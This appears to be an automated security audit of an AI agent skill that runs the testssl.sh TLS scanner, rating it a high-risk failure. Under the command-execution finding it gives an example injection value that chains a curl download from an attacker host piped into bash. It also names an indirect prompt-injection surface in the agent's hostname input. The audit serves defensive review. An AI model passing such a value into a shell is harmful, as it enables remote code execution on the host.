Skills
skills/vchirrav/product-security-ai-skills/tls-scan-testssl/Gen Agent Trust Hub

tls-scan-testssl

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to execute shell commands using interpolation: testssl.sh --json <hostname>:<port>. Since there is no input validation or sanitization specified for the <hostname> variable, an attacker can provide a malicious string (e.g., example.com; curl http://attacker.com/malicious.sh | bash) to gain full remote code execution on the host system.
  • [EXTERNAL_DOWNLOADS] (MEDIUM): The 'Prerequisites' section directs the user/agent to download the tool directly from GitHub (git clone https://github.com/drwetter/testssl.sh.git). Executing scripts downloaded at runtime from third-party repositories without integrity verification (like commit hashes or checksums) poses a supply-chain risk.
  • [INDIRECT_PROMPT_INJECTION] (HIGH): Vulnerability surface detected via target input.
  • Ingestion points: The <hostname> parameter provided during task initialization.
  • Boundary markers: None. The input is directly placed into a shell command string.
  • Capability inventory: Full shell execution (bash).
  • Sanitization: None. The instructions do not mention validating the hostname or using a safe execution wrapper.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 08:52 AM